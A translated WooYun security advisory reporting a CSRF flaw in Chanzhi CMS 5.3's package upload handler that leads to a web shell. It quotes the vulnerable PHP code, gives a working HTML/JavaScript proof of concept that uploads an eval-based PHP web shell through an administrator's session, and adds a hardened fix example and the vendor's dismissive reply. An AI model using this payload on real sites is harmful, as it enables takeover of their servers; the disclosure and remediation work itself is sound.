
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0207656

Title: Chanzhi CMS 5.3 CSRF getshell

Vendor: chanzhi.org

Author: 3xpl0it

Submitted: 2016-05-12 14:50

Fixed: 2016-05-12 15:38

Published: 2016-05-12 15:38

Vulnerability type: CSRF

Severity: High

Self-assessed rank: 15

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-05-12: Details sent to the vendor; awaiting the vendor's handling
2016-05-12: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Chanzhi CMS 5.3 CSRF getshell

Detailed description:

/system/module/package/control.php

public function upload($type = 'extension')
{
    $this->view->canManage = array('result' => 'success');
    if(!$this->loadModel('guarder')->verify()) $this->view->canManage = $this->loadModel('common')->verifyAdmin();
    if($_SERVER['REQUEST_METHOD'] == 'POST')
    {
        if($this->view->canManage['result'] != 'success') $this->send(array('result' => 'fail', 'message' => sprintf($lang->guarder->okFileVerify, $this->view->canManage['name'], $this->view->canManage['content'])));

        if(empty($_FILES)) $this->send(array('result' => 'fail', 'message' => '' ));
        $tmpName  = $_FILES['file']['tmp_name'];
        $fileName = $_FILES['file']['name'];   // client-supplied name; its extension is never checked
        $package  = basename($fileName, '.zip');
        // the upload is written under the original client-supplied name
        move_uploaded_file($tmpName, $this->app->getTmpRoot() . "/package/$fileName");
        $info   = $this->package->getInfoFromDB($package);
        $option = (!empty($info) and $info->status == 'installed') ? 'upgrade' : 'install';
        $link   = $option == 'install' ? inlink('install', "package=$package&downLink=&md5=&type={$type}") : inlink('upgrade', "package=$package&downLink=&md5=&type={$type}");
        $this->send(array('result' => 'success', 'message' => $this->lang->package->successUploadedPackage, 'locate' => $link));
    }
    $this->view->title = $this->lang->package->upload;
    $this->display();
}


When a file is uploaded through this back-end handler, the file extension is never checked: the file is moved straight into the package directory by move_uploaded_file under its original name. The request also carries no anti-CSRF token, so the upload can be triggered by CSRF against a logged-in administrator, which yields a shell.

Proof of concept:

PoC:

<html>
<body>
<script>
function submitRequest()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://127.0.0.1/chanzhi/admin.php?m=package&f=upload", true);
    xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryGgFOYWAluy1F8lvn");
    xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4");
    xhr.withCredentials = true;
    var body = "------WebKitFormBoundaryGgFOYWAluy1F8lvn\r\n" +
        "Content-Disposition: form-data; name=\"file\"; filename=\"php.php\"\r\n" +
        "Content-Type: text/php\r\n" +
        "\r\n" +
        "\x3c?php\r\n" +
        "@eval($_GET[\'a\']);\r\n" +
        "?\x3e\r\n" +
        "------WebKitFormBoundaryGgFOYWAluy1F8lvn--\r\n";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
submitRequest();
</script>

</body>
</html>


After the administrator opens the page, the file is created successfully.

(screenshot: 1.png)


phpinfo executes successfully

(screenshot: 2.png)

Suggested fix:

Filter the file extension
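To make the suggested fix concrete, the following is an added example (not chanzhi's code) of the two checks the upload() method above lacks, written as standalone PHP: a session-bound anti-CSRF token compared with hash_equals(), and an extension allow-list applied before the client name is ever reused on disk. The function names and the session key 'csrf_token' are assumptions, and the installer is assumed to need only .zip packages.

```php
<?php
// Added example, not chanzhi's code. The function names and the session key
// 'csrf_token' are assumptions; the installer is assumed to need only .zip.
const ALLOWED_EXT = ['zip'];

// Check 1 (CSRF): the POST must carry a token equal to the one bound to the
// admin session. Another origin cannot read that value, so a forged request
// is rejected before any file is touched.
function csrf_token_ok(array $session, array $post): bool
{
    if (empty($session['csrf_token']) || empty($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// Check 2 (extension allow-list): reduce the client name to its basename and
// require an allowed final extension; "php.php" from the PoC fails here.
function package_name_ok(string $clientName): bool
{
    $base = basename($clientName);
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    return $ext !== '' && $base !== ".$ext" && in_array($ext, ALLOWED_EXT, true);
}

// Hardened shape of the handler body; $files mirrors $_FILES. The client name
// is never reused on disk: the destination is rebuilt from a sanitised stem.
function handle_upload(array $session, array $post, array $files, string $tmpRoot): array
{
    if (!csrf_token_ok($session, $post)) {
        return ['result' => 'fail', 'message' => 'missing or invalid CSRF token'];
    }
    $name = $files['file']['name'] ?? '';
    if (!package_name_ok($name)) {
        return ['result' => 'fail', 'message' => 'only .zip packages are accepted'];
    }
    $stem = preg_replace('/[^A-Za-z0-9_-]/', '_', pathinfo(basename($name), PATHINFO_FILENAME));
    $dest = rtrim($tmpRoot, '/') . '/package/' . $stem . '.zip';
    // The real handler would call move_uploaded_file($files['file']['tmp_name'], $dest) here.
    return ['result' => 'success', 'path' => $dest];
}

// Constructed inputs: a forged POST with no token, a tokened POST naming a
// .php file, and a tokened POST naming a .zip package.
$session = ['csrf_token' => bin2hex(random_bytes(16))];
$ok      = ['csrf_token' => $session['csrf_token']];
var_dump(handle_upload($session, [],  ['file' => ['name' => 'php.php']], '/tmp'));
var_dump(handle_upload($session, $ok, ['file' => ['name' => 'php.php']], '/tmp'));
var_dump(handle_upload($session, $ok, ['file' => ['name' => 'my plugin.zip']], '/tmp'));
```

Only the third call reaches the success branch; the first two are rejected before any file is moved, which is the order of checks a real handler should keep.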

Copyright notice: when reposting, please credit the source: 3xpl0it@WooYun


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2016-05-12 15:38

Vendor reply:

The plugin installation feature has to upload PHP files by necessity, and this feature has strict hosting-space file verification: a specific file with specific content must be created on the hosting space before an upload is allowed.

Latest status:

None